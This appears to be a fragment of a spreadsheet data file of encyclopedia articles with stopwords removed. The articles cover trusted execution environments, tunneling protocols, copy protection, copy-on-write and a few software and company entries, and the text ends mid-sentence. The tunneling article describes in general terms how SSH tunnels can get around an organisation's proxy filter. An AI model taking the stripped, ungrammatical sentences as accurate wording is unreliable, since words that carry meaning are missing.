terms mathematical expectation number bugs found verification review). order reduce costs security risks, therefore kept small possible. this argument debate preferring microkernels monolithic kernels. examples materializes trusted computing base optional component install-time package management system. also black orange book trust anchor hardware security references</t>
  </si>
  <si>
    <t>Trusted computing</t>
  </si>
  <si>
    <t>Trusted execution environment</t>
  </si>
  <si>
    <t>trusted execution environment (tee) secure area main processor. guarantees code data loaded inside protected respect confidentiality integrity, data integrity prevents unauthorized entities altering data entity outside processes data, code integrity code cannot replaced modified unauthorized entities, also computer owner certain schemes described sgx. this done implementing unique, immutable, confidential architectural security intel® software guard extensions (intel® sgx) offers hardware-based memory encryption isolates specific application code data memory. intel® allows user-level code allocate private regions memory, called enclaves, designed protected processes running higher privilege levels. isolated execution environment provides security features isolated execution, integrity applications executing tee, along confidentiality assets. general terms, offers execution space provides higher level security trusted applications running device rich operating system (os) functionality 'secure element' (se). history open mobile terminal platform (omtp) first defined "advanced trusted environment:omtp tr1" standard, defining "set hardware software components providing facilities necessary support applications" meet requirements defined security levels. first security level, profile targeted software attacks profile targeted software hardware attacks.commercial solutions based trustzone technology, conforming standard, later launched, trusted foundations developed trusted logic.work omtp standards ended 2010 group transitioned wholesale applications community (wac).the omtp standards, including defining tee, hosted gsma. details typically consists hardware isolation mechanism, plus secure operating system running isolation mechanism however term used generally mean protected solution. whilst globalplatform requires hardware isolation, others emvco term refer hardware/software software-based solutions. fido uses concept restricted operating environment tees based hardware isolation. only trusted applications running access full power device's main processor, peripherals memory, hardware isolation protects user installed apps running main operating system. software cryptographic isolation inside protect trusted applications contained within other.service providers, mobile network operators (mno), operating system developers, application developers, device manufacturers, platform providers silicon vendors main stakeholders contributing standardization efforts around tee. prevent simulation hardware user-controlled software, so-called "hardware root trust" used. this private keys embedded directly chip manufacturing; one-time programmable memory efuses usually used mobile devices. these cannot changed, even device resets, whose public counterparts reside manufacturer database, together non-secret hash public belonging trusted party (usually chip vendor) used sign trusted firmware alongside circuits cryptographic operations controlling access. hardware designed prevents software signed trusted party's accessing privileged features. public vendor provided runtime hashed; hash compared embedded chip. hash matches, public used verify digital signature trusted vendor-controlled firmware (such chain bootloaders android devices 'architectural enclaves' sgx). trusted firmware used implement remote attestation.when application attested, untrusted component loads trusted component memory; trusted application protected modification untrusted components hardware. nonce requested untrusted party verifier's server, used part cryptographic authentication protocol, proving integrity trusted application. proof passed verifier, verifies valid proof cannot computed simulated hardware (i.e. qemu) order construct access keys baked hardware required; trusted firmware access keys and/or keys derived obtained using them. because platform owner meant access data recorded foundry, verifying party must interact service vendor. scheme implemented improperly, chip vendor track applications used chip selectively deny service returning message indicating authentication passed.to simulate hardware enables illicitly pass remote authentication, attacker would extract keys hardware, costly equipment technical skill required execute example, using focused beams, scanning electron microscopes, microprobing, chip decapsulation even impossible, hardware designed reverse-engineering destroys keys. cases, keys unique piece hardware, extracted chip cannot used others (for example physically unclonable functions). though deprivation ownership inherent property tees possible design system allows user obtained ownership device first control system), practice systems consumer electronics intentionally designed allow chip manufacturers control access attestation algorithms. allows manufacturers grant access tees software developers (usually commercial) business agreement manufacturer, enable cases tivoization drm. uses there number cases tee. though possible cases exploit deprivation ownership, usually used exactly this. premium content protection/digital rights management note: much literature covers topic definition "premium content protection" preferred nomenclature many copyright holders. premium content protection specific case digital rights management (drm), controversial among communities, free software foundation. widely used copyrights holders restrict ways users consume content high definition films. suitable environment protecting digitally encoded information (for example, films audio) connected devices smart phones, tablets televisions. this suitability comes ability deprive owner device reading stored secrets, fact often protected hardware path display and/or subsystems devices. used protect content device: content protected transmission streaming encryption, protects content decrypted device ensuring decrypted content exposed environment approved developer platform vendor. mobile financial services mobile commerce applications mobile wallets, peer-to-peer payments, contactless payments using mobile device point sale (pos) terminal often well-defined security requirements. tees used, often conjunction near field communication (nfc), trusted backend systems provide security required enable financial transactions take place scenarios, interaction user required, require user expose sensitive information pin, password biometric identifier mobile means authenticating user. optionally offers trusted user interface used construct user authentication mobile device. with rise cryptocurrency, tees increasingly used implement crypto-wallets, offer ability store tokens securely regular operating systems, provide necessary computation authentication applications. authentication well-suited supporting biometric methods (facial recognition, fingerprint sensor voice authorization), easier harder steal pins passwords. authentication process generally split three main stages: storing reference "template" identifier device comparison "image" extracted next stage. extracting "image" (scanning fingerprint capturing voice sample, example). using matching engine compare "image" "template".a good area within mobile device house matching engine associated processing required authenticate user. environment designed protect data establish buffer non-secure apps located mobile oses. this additional security help satisfy security needs service providers addition keeping costs handset developers. enterprise, government, cloud used governments, enterprises, cloud service providers enable secure handling confidential information mobile devices server infrastructure. offers level protection software attacks generated mobile assists control access rights. achieves housing sensitive, ‘trusted’ applications need isolated protected mobile malicious malware present. through utilizing functionality security levels offered tee, governments enterprises assured employees using devices secure trusted manner. likewise, server-based tees help defend internal external attacks backend infrastructure. secure modular programming with rise software assets reuses, modular programming productive process design software architecture, decoupling functionalities small independent modules. module contains everything necessary execute desired functionality, allows organize complete system featuring high level reliability security, preventing module vulnerabilities others. order modules communicate share data, provide means securely payloads sent/received modules, using mechanisms objects serialization, conjunction proxies. component-based software engineering operating systems hardware support following hardware technologies used support implementations: amd: platform security processor (psp) secure encrypted virtualization secure nested paging extension arm: trustzone realm management extension confidential compute architecture (cca) ibm: secure service container, formerly zaci, first introduced generation machines (including linuxone machines) driver level secure execution, introduced linuxone generation machines april 2020. intel: trusted execution technology software guard extensions "silent lake" (available atom processors) risc-v: multizone™ security trusted execution environment keystone customizable framework penglai scalable risc-v also open mobile terminal platform trusted computing group fido alliance java card intel management engine intel lagrande software guard extensions platform security processor trusted platform module trustzone secure element next-generation secure computing base references</t>
  </si>
  <si>
    <t>Tunneling protocol</t>
  </si>
  <si>
    <t>computer networks, tunneling protocol communication protocol allows movement data network another, exploiting encapsulation. involves allowing private network communications sent across public network (such internet) process called encapsulation. because tunneling involves repackaging traffic data different form, perhaps encryption standard, hide nature traffic tunnel. tunneling protocol works using data portion packet (the payload) carry packets actually provide service. tunneling uses layered protocol model tcp/ip protocol suite, usually violates layering using payload carry service normally provided network. typically, delivery protocol operates equal higher level layered model payload protocol. uses tunneling protocol may, example, allow foreign protocol network support particular protocol, running ipv6 ipv4. another important provide services impractical unsafe offered using underlying network services, providing corporate network address remote user whose physical network address part corporate network. circumventing firewall policy users also tunneling "sneak through" firewall, using protocol firewall would normally block, "wrapped" inside protocol firewall block, http. firewall policy specifically exclude kind "wrapping", trick function around intended firewall policy interlocked firewall policies). another http-based tunneling method uses http connect method/command. client issues http connect command http proxy. proxy makes connection particular server:port, relays data server:port client connection. because creates security hole, connect-capable http proxies commonly restrict access connect method. proxy allows connections specific ports, https.other tunneling methods able bypass network firewalls make different protocols dns, mqtt, sms. technical overview example network layer network layer, generic routing encapsulation (gre), protocol running protocol number 47), often serves carry packets, 1918 private addresses, internet using delivery packets public addresses. case, delivery payload protocols same, payload addresses incompatible delivery network. also possible establish connection using data link layer. layer tunneling protocol (l2tp) allows transmission frames nodes. tunnel encrypted default: tcp/ip protocol chosen determines level security. uses port enable data encryption payloads transmitted public network (such internet) connection, thereby providing functionality. ipsec end-to-end transport mode, also operate tunneling mode trusted security gateway. understand particular protocol stack imposed tunneling, network engineers must understand payload delivery protocol sets. common tunneling protocols (protocol ipv4/ipv6 sit/ipv6 (protocol 41): ipv6 ipv4/ipv6 (protocol 47): generic routing encapsulation openvpn (udp port 1194) sstp (tcp port 443): secure socket tunneling protocol ipsec (protocol 51): internet protocol security l2tp (protocol 115): layer tunneling protocol vxlan (udp port 4789): virtual extensible local area network. geneve wireguard secure shell tunneling secure shell (ssh) tunnel consists encrypted tunnel created protocol connection. users tunnels transfer unencrypted traffic network encrypted channel. software-based approach network security result transparent encryption.for example, microsoft windows machines share files using server message block (smb) protocol, non-encrypted protocol. mount microsoft windows file-system remotely internet, someone snooping connection could transferred files. mount windows file-system securely, establish tunnel routes traffic remote fileserver encrypted channel. even though protocol contains encryption, encrypted channel travels offers security. once connection established, tunnel starts listening port remote local host. connections forwarded specified address port originating opposing (remote local, previously) host. tunneling tcp-encapsulating payload (such ppp) tcp-based connection (such ssh's port forwarding) known "tcp-over-tcp", induce dramatic loss transmission performance problem known "tcp meltdown"), virtual private network software instead protocol simpler tunnel connection. however, often problem using openssh's port forwarding, many cases entail tcp-over-tcp tunneling; meltdown avoided openssh client processes local, client-side connection order actual payload sent, sends payload directly tunnel's connection server side, openssh server similarly "unwraps" payload order "wrap" routing final destination. naturally, wrapping unwrapping also occurs reverse direction bidirectional tunnel. tunnels provide means bypass firewalls prohibit certain internet services long site allows outgoing connections. example, organization prohibit user accessing internet pages (port directly without passing organization's proxy filter (which provides organization means monitoring controlling user sees web). users wish traffic monitored blocked organization's proxy filter. users connect external server, create tunnel forward given port local machine port remote server. access remote server, users would point browser local port http://localhost/ some clients support dynamic port forwarding allows user create socks proxy. case users configure applications local socks proxy server. this gives flexibility creating tunnel single port previously described. socks free user limitations connecting predefined remote port server. application support socks, proxifier used redirect application local socks proxy server. some proxifiers, proxycap, support directly, thus avoiding need client. recent versions openssh even allowed create layer layer tunnels ends enabled tunneling capabilities. this creates (layer default) (layer virtual interfaces ends connection. this allows normal network management routing used, used routers, traffic entire subnetwork tunneled. pair virtual interfaces function like ethernet cable connecting ends connection join kernel bridges. cyberattacks based tunneling over years, tunneling data encapsulation general frequently adopted malicious reasons, order maliciously communicate outside protected network. context, known tunnels involve protocols http, ssh, dns, mqtt. also gprs tunnelling protocol (gtp) http tunnel icmp tunnel nvgre model (diagram) pseudo-wire stunnel tunnel broker virtual extensible (vxlan) virtual private network (vpn) references external links portfusion distributed reverse forward, local forward proxy tunneling solution protocols tunnel, ssh-based virtual private networks section barbatunnel project free open source implementation http-tunnel udp-tunnel windows vpnhood project free open source implementation using socket redirection</t>
  </si>
  <si>
    <t>Copy prevention</t>
  </si>
  <si>
    <t>copy protection, also known content protection, copy prevention copy restriction, describes measures enforce copyright preventing reproduction software, films, music, media.copy protection commonly found videotapes, dvds, blu-ray discs, hd-dvds, computer software discs, video game discs cartridges, audio vcds. some methods copy protection also criticism caused inconvenience paying consumers secretly installed additional unwanted software detect copying activities consumer's computer. making copy protection effective protecting consumer rights remains problem media publication. terminology media corporations always used term copy protection, critics argue term tends sway public identifying publishers, favor restriction technologies, rather users. copy prevention copy control neutral terms. "copy protection" misnomer systems, number copies made original copies work, computer, dongle, another device cannot easily copied. term also often related confused with, concept digital rights management. digital rights management general term includes sorts management works, including copy restrictions. copy protection include measures digital. appropriate term "technological protection measures" (tpms), often defined technological tools order restrict access work. business rationale unauthorized copying distribution accounted $2.4 billion lost revenue united states 1990 1994, assumed causing impact revenues music video game industry, leading proposal stricter copyright laws pipa. many media formats easy copy using machine, allowing consumers distribute copies friends, practice known "casual copying". companies publish works copyright protection believe cost implementing copy protection less revenue produced consumers product instead acquiring casually copied media. opponents copy protection argue people obtain free copies free would purchase copy unable obtain free copy. some even argue free copies increase profit; people receive free copy music band's music, would done otherwise. some publishers avoided copy-protecting products theory resulting inconvenience users outweighs benefit frustrating "casual copying". from perspective user, copy protection always cost. license managers sometimes fail, inconvenient use, afford user legal product purchased. term copy protection refers technology used attempt frustrate copying, legal remedies available publishers authors whose copyrights violated. software usage models range node locking floating licenses (where fixed number licenses concurrently used across enterprise), grid computing (where multiple computers function unit common license) electronic licensing (where features purchased activated online). term license management refers broad platforms enable specification, enforcement tracking software licenses. safeguard copy protection license management technologies tampering hacking, software anti-tamper methods used. floating licenses also referred indirect licenses, licenses time issued, actually user them. that technical influence characteristics. direct licenses issued certain user requires example, activated microsoft product, contains direct license locked product installed. from business standpoint, hand, services monetize additional services media content users better experience simply obtaining copied product. technical challenges from technical standpoint, seems impossible completely prevent users making copies media purchase, long "writer" available write blank media. types media require "player"—a player, player, videotape player, computer video game console—which must able read media order display human. logically, player could built reads media writes exact copy read type media. minimum, digital copy protection non-interactive works subject analog hole: regardless digital restrictions, music heard human ear, also recorded least, microphone tape recorder); film viewed human eye, also recorded least, video camera recorder). practice, almost-perfect copies typically made tapping analog output player (e.g. speaker output headphone jacks) and, redigitized unprotected form, duplicated indefinitely. copying text-based content tedious, principle applies: printed displayed, also scanned ocred. with basic software patience, techniques applied typical computer-literate user. since basic technical facts exist, follows determined individual definitely succeed copying media, given enough time resources. media publishers understand this; copy protection intended stop professional operations involved unauthorized mass duplication media, rather stop "casual copying". copying information goods downloaded (rather mass-duplicated physical media) inexpensively customized download, thus restricted effectively, process known "traitor tracing". they encrypted fashion unique user's computer, decryption system made tamper-resistant. methods information individual protection schemes technologies, list copy protection schemes relevant category page. computer software copy protection computer software, especially games, long cat-and-mouse struggle publishers crackers. these (and are) programmers defeated copy protection software hobby, alias title screen, distribute "cracked" product network warez bbses internet sites specialized distributing unauthorized copies software. early ages when computer software still distributed audio cassettes, audio copying unreliable, digital copying time consuming. software prices comparable audio cassette prices. make digital copying difficult, many programs used non-standard loading methods (loaders incompatible standard basic loaders, loaders used different transfer speed). unauthorized software copying began problem floppy disks became common storage media. ease copying depended system; jerry pournelle wrote byte 1983 "cp/m lend copy protection" users "haven't worried" "apple users, though, always problem. used trs-dos, understand ms-dos copy protection features". 1980s locksmith pournelle disliked copy protection and, except games, refused review software used believe useful, writing 1983 "for every copy protection scheme there's hacker ready defeat most involve so-called nibble/nybble copiers, analyze original disk make copy". ibm's estridge agreed: guarantee whatever scheme come take less time break think it." while calling piracy threat software development. it's going software", said "it's wrong copy-protect programs there ought stop [piracy] without creating products unusable."copy protection sometimes caused software clones, apple ii-compatible laser 128. back forth struggle copy protection engineers nibble copiers continued apple became obsolete replaced clones. 1989 gilman louie, head spectrum holobyte, stated copy protection added $0.50 copy cost production game. other software relied complexity; antic 1988 observed wordperfect atari almost unusable without manual pages!". (the magazine mistaken; version widely pirated company threatened discontinue it.) limit reusing activation keys install software multiple machines, attempted installed software specific machine involving unique feature machine. serial number could used machines them. some popular surrogate machine serial number date time second) initialization hard disk address ethernet cards (although programmable modern cards). with rise virtualization, however, practice locking simple hardware parameters still prevent copying. early video games during 1980s 1990s, video games sold audio cassette floppy disks sometimes protected external user-interactive method demanded user original package part usually manual. copy protection activated installation, every time game executed.several imaginative creative methods employed, order hard copy. these include: common method requiring player enter specific word (often chosen random) manual. variant technique involved matching picture provided game manual providing answer pertaining picture (ski die, boxing james bond 007; stealth affair used technique). buzz aldrin's race into space floppy version version) required user input astronaut's total duration space (available manual) launch certain missions. answer incorrect, mission would suffer catastrophic failure. manuals containing information hints vital completion game, like answers riddles (conquests camelot, king's quest recipes spells (king's quest keys deciphering non-latin writing systems (ultima series, also ultima writing systems), maze guides (manhunter), dialogue spoken characters game (wasteland, dragon wars), excerpts storyline (most advanced dungeons dragons games wing commander radio frequency communicate character game (metal gear solid). some sort code symbols, existing keyboard ascii code. this code arranged grid, entered virtual keyboard request "what code line 2?". these tables printed dark paper (maniac mansion, uplink), visible transparent layer (indiana jones last crusade), making paper difficult photocopy. another variant method—most famously used spectrum version willy—was card color sequences grid reference entered starting game. this also prevented monochrome photocopying. thought codes tables based mathematical formula could calculated using row, line page number formula known, function disk space requirement data. later research proved case. secret monkey island offered rotating wheel halves pirate's faces. game showed face composed different parts asked pirate hanged certain island. player match faces wheel, enter year appeared island-respective hole. sequel concept, magic potion ingredients. other games employed code wheel system include star control. zork games beyond zork zork zero came "feelies" contained information vital completion game. example, parchment found zork zero contained clues vital solving final puzzle. however, whenever player attempts read parchment, referred game package. lenslok system used plastic prismatic device, shipped game, used descramble code displayed screen. early copies playroom broderbund software included game called "what missing?" every fifth time program booted player would pattern refer back manual find objects spinner counting game would match pattern seen back manual order open game.all methods proved troublesome tiring players, greatly declined usage mid-1990s, point emergence primary video game medium made copy protection largely redundant, since copying technology widely available time.some game developers, markus persson, encouraged consumers developers embrace reality unlicensed copying utilize positively generate increased sales marketing interest. videotape starting 1985 video release cotton club (beta versions only), macrovision licensed publishers technology exploits automatic gain control feature vcrs adding pulses vertical blanking sync signal. these pulses negatively affect picture quality, succeed confusing recording-level circuitry many consumer vcrs. this technology, aided u.s. legislation mandating presence automatic gain-control circuitry vcrs, said "plug analog hole" make vcr-to-vcr copies impossible, although inexpensive circuit widely available defeat protection removing pulses. macrovision patented methods defeating copy prevention, giving straightforward basis shut manufacture device descrambles often exists world. while used pre-recorded tapes, system adopted television broadcasts; michael fuchs said 1985 macrovision "not good technology" reduced picture quality consumers could easily bypass peter chernin showtime said want accommodate subscribers know like tape movies". notable payloads over time, software publishers (especially case video games) became creative crippling software case duplicated. these games would initially show copy successful, eventually render unplayable subtle methods. many games "code checksumming" technique prevent alteration code bypass copy protection. important constants game accuracy player's firing, speed movement, etc. included game calculated numbers making machine code parts game. code changed, calculation yields result longer matches original design game game plays improperly. superior soccer outward signs copy protection, decided legitimate copy, made soccer ball game invisible, making impossible play game. meier's pirates, player entered wrong information, could still play game, substantially increased difficulty. satirical issue, thriller-action game alan wake detects game cracked pirated copy, replace tips loading screens messages telling player game. game created copied game, additional effect take place. humorous "piracy", alan wake gain black eyepatch right eye, complete miniature jolly roger. while copy protection mckracken alien mindbenders hidden such, repercussions missing codes unusual: player ended jail (permanently), police officer gave lengthy condescending speech software copying. case copied versions settlers iii, iron smelters produced pigs play iron); weaponsmiths require iron produce weapons, players amass arms. bohemia interactive studio developed unique subtle protection system game operation flashpoint: cold crisis. dubbed fade, detects unauthorized copy, inform player immediately instead progressively corrupts aspects game (such reducing weapon accuracy zero) point eventually becomes unplayable. message "original discs fade" eventually appear game detected unauthorized copy. fade also used arma similarly diminish accuracy player’s weapons, well induce “drunken vision” effect, screen becomes wavy, player playing unauthorized copy. this system also used take helicopters, screen blurred distorted playing counterfeit copy, making hard safely pilot helicopter. indycar series (2003 video game) also utilizes fade technology safeguard piracy making races difficult pirated version. penultimate section game’s manual states:copying commercial games, one, criminal offense copyright infringement.copying re-supplying games lead term imprisonment.think pirated game stolen property.this game protected fade system. play pirated game- long. quality pirated game degrade time. purchase genuine software legitimate stores. batman: arkham asylum contained code disabled batman's glider cape, making areas game difficult complete certain achievement/trophy impossible unlock (gliding continuously 100m). version grand theft auto copy protection swings camera though player drunk. player enters vehicle automatically throttle, making difficult steer. also damages vehicle, making vulnerable collisions bullets. update game prevented unauthorised copies accessing in-game browser, making impossible finish game missions involve browsing objectives. earthbound well-documented extensive checksums ensure game played legitimate hardware. game detects played european snes, refuses boot, first several checksums failed. second checksum weed unauthorized copies game, hacking data past checksum trigger third checksum makes enemy encounters appear much often authorized copy, player progresses game without giving cracks protection), final checksum code activate final boss battle, freezing game deleting save files. similar copy protection system used spyro: year dragon, although uses copy protection check beginning game (see below). unauthorized version edition mass effect, game save mechanism work in-game galactic caused game crash. galactic needed travel different sections game, player became stuck first section game. unauthorized version sims used, build mode would work properly. walls could built player's property, prevented player building custom houses. some furniture clothing selections would available either. march 2009 update beejive iphone included special functionality users unauthorized version: screen would read load letter" whenever user tried establish connection service, quickly switch youtube clip movie office space. alert lord rings: battle middle-earth copy protection system completely wipes player's forces briefly battle begins unlicensed copy. however, purchased latter encountered caused copy protection scheme trigger supposed player pirated nintendo version michael jackson: experience, vuvuzela noises play notes song, become invisible. game also freeze player tries pause older versions autodesk dongle copy protection; missing, program randomly corrupt points user's model usage, destroying work. older versions cdrwin used serial number initial copy protection. however, check bypassed, second hidden check would activate causing random factor introduced burning process, producing corrupted "coaster" disks. terminate, terminal package, would appear operate normally cracked would insert warning pirated copy iemsi login packet transmitted, sysop user called could clearly read ubik's musik, music creation tool commodore would transform space invaders game detected cartridge-based copying device attempted interrupt this copy protection system also doubles easter egg, message appears occurs hostile ("plug joystick port press fire, resetting/experting!"). amiga version bomberman featured multitap peripheral also acted dongle. data multitap used calculate time limit level. multitap missing, time limit would calculated causing level immediately. nevermind, puzzle game amiga, contained code caused unlicensed version game behave demo. game would play three levels sampled throughout game, give message "you completed three levels; however levels complete original disc." spyro: year dragon character named tell player outside room containing balloon midday garden home several areas player using unlicensed copy. this conversation purposely corrupts data. when corrupted, game would remove stray gems ability progress certain areas also make final boss unbeatable, returning player beginning game (and removing save file time) seconds battle. atari jaguar console would freeze startup play sound enraged jaguar snarling inserted cartridge failed initial security check. lenslok copy protection system gave obvious message lens-coded letters entered incorrectly, user soft-reset machine, areas memory occupied game would flooded message "thank your interest product. nice try. love bj/nj" prevent user examining leftover code crack protection. update sandbox game garry's enabled copy protection mechanism outputs error "unable shade polygon normals" game detects copied. error also includes user's steam error meaning users identified steam account asking help error internet. atari version alternate reality: dungeon would player's character attacked unbeatable "fbi agents" detected cracked version. agents would also appear restoring save created version, even version restoring save legal. planets, play-by-bbs strategy game, contained code server would check clients' submitted turns suspect registration codes. player deemed using cracked copy, cheating game, would random forces destroyed throughout game unbeatable enemy called "the continuum" (after game's author, wissemann). similar commercial game, stars!, would issue empty turn updates players invalid registration codes, meaning none orders would ever carried out. copied version original version postal, soon game started, player character would immediately shoot head. serious bfe, game code detects believes unauthorized copy, invincible scorpion-like monster spawned beginning game high speeds, melee attacks, attacks range twin chainguns making game extremely difficult preventing player progressing further. also level "under iron cloud", player's character spin out-of-control looking air. unauthorized copy pokémon black white sequels normal, pokémon gain experience points battle. this since solved patching game's files. attorney investigations detects illegitimate downloaded copy game, convert entire game's text game's symbol based foreign language, borginian, cannot translated way. unlicensed version indie game game tycoon, player runs game development company, dramatically increase piracy rate games player releases point money made all, disable player's ability take action stand-alone expansion crytek's crysis, crysis warhead, players pirated game ammunition replaced chickens inflict damage little knockback, rendering ranged combat impossible. crytek's crysis player used unlicensed copy game, able defeat last boss (the alpha ceph), thus making impossible beat game. mirror's edge, copy protection prevent player character, faith, sprinting, making impossible players jump long gaps progress pirated copy. legend zelda: spirit tracks player playing pirated copy game remove train control detects pirated, effectively stonewalls player train's tutorial section early thus making game unbeatable.the usage copy protection payloads lower playability game without making clear result copy protection generally considered unwise, potential result unaware players unlicensed copies spreading word-of-mouth game quality. authors fade explicitly acknowledged reason including explicit warning message. anti-copyright-infringement anti-copyright-infringement measures efforts fight copyright infringement, counterfeiting, violations intellectual property laws. includes, means limited combined efforts corporate associations (such riaa mpaa), enforcement agencies (such interpol), various international governments combat copyright infringement relating various types creative works, software, music films. these measures often come form copy protection measures drm, measures implemented content protection network, distil networks incapsula. richard stallman project criticized word "piracy" situations, saying publishers word refer "copying approve "they [publishers] imply ethically equivalent attacking ships high seas, kidnapping murdering people them". certain forms anti-piracy (such drm), considered consumers control products content sale. case mpaa hotfile, judge kathleen williams granted motion deny prosecution usage words views "pejorative". this list included word "piracy", which, motion defense stated, would serve purpose misguide inflame jury. plaintiff argued common terms referring copyright infringement invalidate motion, judge concur. anti-copyright-infringement file sharing today copyright infringement often facilitated file sharing. fact, infringement accounts 23.8% internet traffic 2013. effort this, large small films music corporations issued dmca takedown notices, filed lawsuits, pressed criminal prosecution host file sharing services. also core dump digital rights management digital watermarking floating licensing cheat cartridge license manager list copy protection schemes software anti-tamper sony copy protection scandal tamper resistance trade group efforts file sharing references external links v-max copy protection copy protection depth evaluating copy-prevention techniques audio disk preservation project discusses analyzes protections used floppy-based systems. comprehensive article video game piracy prevention. several algorithms used generate serial keys copy protection analysis details rapidlok tracks copy protection system used many releases</t>
  </si>
  <si>
    <t>Copy protection</t>
  </si>
  <si>
    <t>Copy-on-write</t>
  </si>
  <si>
    <t>copy-on-write (cow), sometimes referred implicit sharing shadowing, resource-management technique used computer programming efficiently implement "duplicate" "copy" operation modifiable resources. resource duplicated modified, necessary create resource; resource shared copy original. modifications must still create copy, hence technique: copy operation deferred first write. sharing resources way, possible significantly reduce resource consumption unmodified copies, adding small overhead resource-modifying operations. virtual memory management copy-on-write finds main sharing virtual memory operating system processes, implementation fork system call. typically, process modify memory immediately executes process, replacing address space entirely. thus, would wasteful copy process's memory fork, instead copy-on-write technique used. copy-on-write implemented efficiently using page table marking certain pages memory read-only keeping count number references page. when data written pages, operating-system kernel intercepts write attempt allocates physical page, initialized copy-on-write data, although allocation skipped reference. kernel updates page table (writable) page, decrements number references, performs write. allocation ensures change memory process visible another's. copy-on-write technique extended support efficient memory allocation page physical memory filled zeros. when memory allocated, pages returned refer page zeros marked copy-on-write. this way, physical memory allocated process data written, allowing processes reserve virtual memory physical memory memory sparsely, risk running virtual address space. combined algorithm similar demand paging.copy-on-write pages also used linux kernel's same-page merging feature. software also used library, application system code. examples string class provided standard library specifically designed allow copy-on-write implementations initial c++98 standard, newer c++11 standard: programming language, types except references implemented copy-on-write. example, strings arrays passed reference, modified, duplicated non-zero reference counts. this allows value types without performance problems copying assignment making immutable.in framework, many types copy-on-write ("implicitly shared" qt's terms). uses atomic compare-and-swap operations increment decrement internal reference counter. since copies cheap, types often safely used multiple threads without need locking mechanisms mutexes. benefits thus valid single- multithreaded systems. computer storage also used underlying mechanism snapshots, provided logical volume management, file systems btrfs zfs, database servers microsoft server. typically, snapshots store modified data, stored close original, weak form incremental backup cannot substitute full backup. also allocate-on-flush demand paging dirty computer security vulnerability linux kernel flyweight pattern memory management persistent data structure refs virtual memory wear leveling references</t>
  </si>
  <si>
    <t>TtyEmulator</t>
  </si>
  <si>
    <t>ttyemulator freeware terminal emulator application client ssh, telnet, rlogin, computing protocols serial console client. ttyemulator written microsoft windows, ported various operating systems, requested. ttyemulator written maintained fcs. several release type fetched autoupdate feature. users software free charge even private companies. features global features session manager included layouts (tree mode folders). user defined hotkey access sessions manager. help file included [french moment, english translation progress] registering windows portable edition enables user store software, configuration file, even personal language file external storage (usb key, etc.) users edit configuration file, using portable edition (configuration file format). proxy support (socks 4,4a,5, http, local) (proxy authentication also supported) scripting (with special escape characters support) auto-update feature. global and/or session specific contextual commands. bouncing management (enables users connect first server automatically make second connection another server). display detailed information established communications. zlib compression support several languages support (french english included default), users make language file order adapt software natural language. specifics commands support (ssh bouncing specific commands included) telnet serial communication predefined display (80x25, 132x50, fullscreen, etc.) server automatic launching session startup. filezilla winscp interfacing session specific features eye-candy display features (customized background, font, size, etc.) clipboard eight entries. session scroll locking. enables users easily create windows shortcuts sessions. customized buffer size. user defined session icon. bundled applications main functions realized ttyemulator files themselves: ttyemulator telnet ssh, serial, tcp-raw, udpserver itself; agent agent also emulate pagent (the putty agent); tftp client tftp client included. also comparison clients securecrt putty cygwin/x winscp filezilla xming references external links home page ttyemulator's direct download link</t>
  </si>
  <si>
    <t>Core FTP</t>
  </si>
  <si>
    <t>core freeware secure client windows, developed coreftp.com. features include ftp, ssl/tls, sftp ssh, http/https support. secure clients encrypt account information data transferred across internet, protecting data seen sniffed across networks. core traditional client local files displayed left, remote files right. core server secure server windows, developed coreftp.com, starting 2010. licensing coreftp free personal, educational, non-profit, business use. also comparison client software list server software reviews references magazine ways supercharge windows odds ends core softpedia.com reviews "today, core lite!" codrut nistor, editor, software reviews references external links official website</t>
  </si>
  <si>
    <t>Core International</t>
  </si>
  <si>
    <t>core international, inc. commonly known core, multinational computer technology corporation headquartered boca raton, florida, united states. company part sony longer exists stand-alone identity. company founded 1979 prewitt technology firm develop, market support computer related products services. they best known supporting ibm's first business microcomputers 5100, 5110 5120. with introduction company provided extensive line disk drives, backup personal computer products. core became well known leading industry developer disk array computer data storage. many core's products first kind, direct competition widely regarded superior performance reliability. users computer press raved core's products. infoworld described core's atplus built like sherman tank, offering exceptional performance reliability." magazine called "workhorses performance computing" "high-quality construction..breaks speed barrier access times" asked "will manufactures follow suit?" core known advertising perhaps produced industry's greatest promotions. 1985 1986 rebate recall hard disk drives. successful controversial, rumor topic board directors meeting. time gave away free purchasing core's atplus drives.core remained private company solely owned prewitt 1993 purchased aiwa, wholly owned subsidiary sony. history business history pre-incorporation 1975–1980: founding company built early work prewitt using business personal computer development experiences. this period creation first microcomputers, launch altair 8800 founding microsoft. selling programming minicomputers assembling microcomputers, attaching computer peripherals, programming building business computer systems. core created different business model. initially, marketed association structured for-profit organization specifically users 5100 series system/23. objective sell mail-order computer supplies, pre-developed (off-the-shelf) programs hardware maintenance service. supplies included printer ribbons paper, diskettes, tape cartridges. software ranged simple mortgage interest calculations, word processing, games utilities advanced payroll, accounting industry specific applications. users wanted readily available, simple install support software also cost. core able fill niche developed machines engineering scientific applications mind, business programs construction, agriculture, manufacturing generally available. computer maintenance insurance program provided on-site repairs replacement parts, provided service lower cost available directly ibm. company successful attracting users 5100 series many sales representatives referred customers organization. while core grew, profits used continuing development computer data storage. 1981–1983: hard disk drives, 5100 series these machines closed architecture, design information unpublished held secret. computer systems design extremely likely impossible ability swap components, obtain support vendors upgrade better configuration/another model unless option available original manufacturer. limitations make customer dependent vendor products services software hardware parts system. core sensed opportunity provide greater faster computer data storage. after five-year effort, september 1982 announced availability first hard disk drives local area network (lan) 5100 series. systems sold storage limited without network option; 5100 tape 5110 5120 restricted floppy disks. core drives available starting increased removable fixed configurations. corenet, built core storage system, allowed interconnection eight 5100 series systems, providing ability share storage data. this configuration pre-dated lans period compatibles. 1983, core introduced major solutions withdrawing marketing 5100 series. first, software called pc51 would allowed 5100 series computer programs written basic unmodified compatibles ms-dos. second, card compatibles provided connection 5100 series network. these solutions allowed 5110/5120 series users technology increase productivity retaining investment equipment software. core's development storage systems, pc51 software major technology engineering feat without rivals. complexity successful reverse engineering systems, resulted captive market organization able provide upgrade path owners. 1984–1986: educating marketplace, vad, hard disk drives, backup 1984, core expanded product focus entered personal computer (pc) marketplace. company's first product introduced year before, called pc-51, completely operating system (and language) compatibles. enabled function like 5110/5120 system, demonstrating company's strong software development capabilities. allow users continue using application software already developed, increased processing speed factor times, reduced maintenance cost 90%. this product opened unexplored marketplace core allowing company become value-added dealer (vad) sell core products individually combined package. authorized promoted relationship provided upgrade path customers previously unavailable. result early development effort 5100 series, core released family high-performance hard disk drives called atplus series, better capacity, reliability performance ibm's drives. weeks introduction august 1984, core discovered problems factory-issued hard disk drive. media 